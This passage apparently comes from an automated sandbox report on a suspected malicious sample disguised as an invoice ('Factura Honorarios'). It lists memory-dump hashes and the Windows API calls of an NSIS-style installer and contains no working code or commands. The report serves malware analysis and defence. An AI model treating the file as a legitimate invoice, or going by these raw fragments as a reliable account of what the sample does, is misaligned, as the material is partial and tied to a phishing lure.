                                                                                                                                  • Instruction Fuzzy Hash: 26C1B075E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5aa84fc786949ae774568f067f240b1c1df557d9fc344d44cdfc3bb9d63ab424
                                                                                                                                  • Instruction ID: c2a3e86c90655d7771e34f7426035c240375675753f8b5583d7366e96b928072
                                                                                                                                  • Opcode Fuzzy Hash: 5aa84fc786949ae774568f067f240b1c1df557d9fc344d44cdfc3bb9d63ab424
                                                                                                                                  • Instruction Fuzzy Hash: 01C1B074E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 26fbd75f887d31ae710b62ae44f2b83cfba82df796a391ed002e286ca5b340e6
                                                                                                                                  • Instruction ID: 673e7320cedb7ddd543c83b6edf0b721b8ba48d41b65c3a4a66494f7675f84e2
                                                                                                                                  • Opcode Fuzzy Hash: 26fbd75f887d31ae710b62ae44f2b83cfba82df796a391ed002e286ca5b340e6
                                                                                                                                  • Instruction Fuzzy Hash: FFC1C074E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 23408b5091c5e553dc6737519ec12efff2f4cc08a61ae5d706ffae7d5007bde0
                                                                                                                                  • Instruction ID: 65ae5e45e7fe8384f00d014b477092cb9396aeaead8bbf7bb2f6dfab8393a010
                                                                                                                                  • Opcode Fuzzy Hash: 23408b5091c5e553dc6737519ec12efff2f4cc08a61ae5d706ffae7d5007bde0
                                                                                                                                  • Instruction Fuzzy Hash: 12C1CF74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6352abc41786edf36424edbc5a200dcb94712020ae3dae91553616a283cb28e8
                                                                                                                                  • Instruction ID: 1f645e44f77d5fa382cc8f2f6660f9cc969b15b421e3173217206f044ee8c435
                                                                                                                                  • Opcode Fuzzy Hash: 6352abc41786edf36424edbc5a200dcb94712020ae3dae91553616a283cb28e8
                                                                                                                                  • Instruction Fuzzy Hash: 79C1A074E01218CFEB14DFA9C984B9DBBB2BF89300F5081A9D809AB355DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c03c378cfe93c506c723837d5f48d9c59773ed967e615d3d378928726bafabbb
                                                                                                                                  • Instruction ID: 029e4831758c0ea445a25cc8e6d337f6302a2e3f08595c1e605dec3a2ada1283
                                                                                                                                  • Opcode Fuzzy Hash: c03c378cfe93c506c723837d5f48d9c59773ed967e615d3d378928726bafabbb
                                                                                                                                  • Instruction Fuzzy Hash: B1C1AF74E01218CFEB14DFA9C984B9DBBB2BF89300F1081A9D809AB355DB359E85DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b6e558e4603e1a7133774e160cd6df3179cc3d406b228617075ead0d170705b2
                                                                                                                                  • Instruction ID: d1494078b82c38de2c6c462a99e6407488a3a569ab0d746df7fe6bced4a11ce7
                                                                                                                                  • Opcode Fuzzy Hash: b6e558e4603e1a7133774e160cd6df3179cc3d406b228617075ead0d170705b2
                                                                                                                                  • Instruction Fuzzy Hash: D7C1B074E01218CFEB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8048ff4948486aa148bc70acc898e93c93c2b36c0bcf06035032563c7c267c89
                                                                                                                                  • Instruction ID: ae1212b6c014af4395ee10af7f29e0d6b8261c98e0d3b1ebca330bb5a13ad220
                                                                                                                                  • Opcode Fuzzy Hash: 8048ff4948486aa148bc70acc898e93c93c2b36c0bcf06035032563c7c267c89
                                                                                                                                  • Instruction Fuzzy Hash: 40B1AF78E00218CFDB14DFA4C980B9DBBB2AF49304F6081A9D809B7355DB359E81DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f02a04e0362debc6a7170686dbccb28ef309bfb8de8f8f5342f6e976fe0ca6c
                                                                                                                                  • Instruction ID: ad2773872bcdf405c6697fca1a087d5677c575b614d231fbbffef0e703947926
                                                                                                                                  • Opcode Fuzzy Hash: 4f02a04e0362debc6a7170686dbccb28ef309bfb8de8f8f5342f6e976fe0ca6c
                                                                                                                                  • Instruction Fuzzy Hash: A3B16374E10218CFDB54DFA9C894A9DBBB2FF89314F2081A9D819AB365DB30AD41CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11b437a7853f1eee09c5ddb2b87330b0f79694bd9f613465c05c923ebc9912c2
                                                                                                                                  • Instruction ID: ae7913e8088af08addfff86c6bd423371f7f8ed7e94c994c8f7a334afd2e0f64
                                                                                                                                  • Opcode Fuzzy Hash: 11b437a7853f1eee09c5ddb2b87330b0f79694bd9f613465c05c923ebc9912c2
                                                                                                                                  • Instruction Fuzzy Hash: 0851B474E15648CFDB15CFAAC484ADDBBF2BF89310F2481AAD408AB365D7359942CF11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb0b748533d8f6a25be4fc4f52f8cd124e57df86da7405d8dc353fbf1162d5f9
                                                                                                                                  • Instruction ID: 61c19210d072cbab77bac90eb4d41a337d8a2b96043e44de30ea67f36dae2bc7
                                                                                                                                  • Opcode Fuzzy Hash: fb0b748533d8f6a25be4fc4f52f8cd124e57df86da7405d8dc353fbf1162d5f9
                                                                                                                                  • Instruction Fuzzy Hash: 6041CAB8D1221A9FDB00CFA8D594BEEBBF1AF49304F1444A9E414B73A0D7799A40CF94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405600
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {$6B
                                                                                                                                  • API String ID: 590372296-3705917127
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FE3
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                  • String ID: 6B
                                                                                                                                  • API String ID: 184305955-4127139157
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,75573420,00435000,00000000), ref: 004039F5
                                                                                                                                  • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A75
                                                                                                                                  • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                                                  • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A93
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403ADC
                                                                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                                                  • API String ID: 1975747703-949986762
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                  • String ID: 1C@$N
                                                                                                                                  • API String ID: 3103080414-3285487881
                                                                                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                                                  • lstrcmpiW.KERNEL32(004281A0,004236E8,00000000,?,?), ref: 00404853
                                                                                                                                  • lstrcatW.KERNEL32(?,004281A0), ref: 0040485F
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A$6B
                                                                                                                                  • API String ID: 2624150263-3505403099
                                                                                                                                  • Opcode ID: f4822edb5301cf4442e229a76cbeaed91e351fc72555ed6df650faa9417c082b
                                                                                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                                                  • Opcode Fuzzy Hash: f4822edb5301cf4442e229a76cbeaed91e351fc72555ed6df650faa9417c082b
                                                                                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
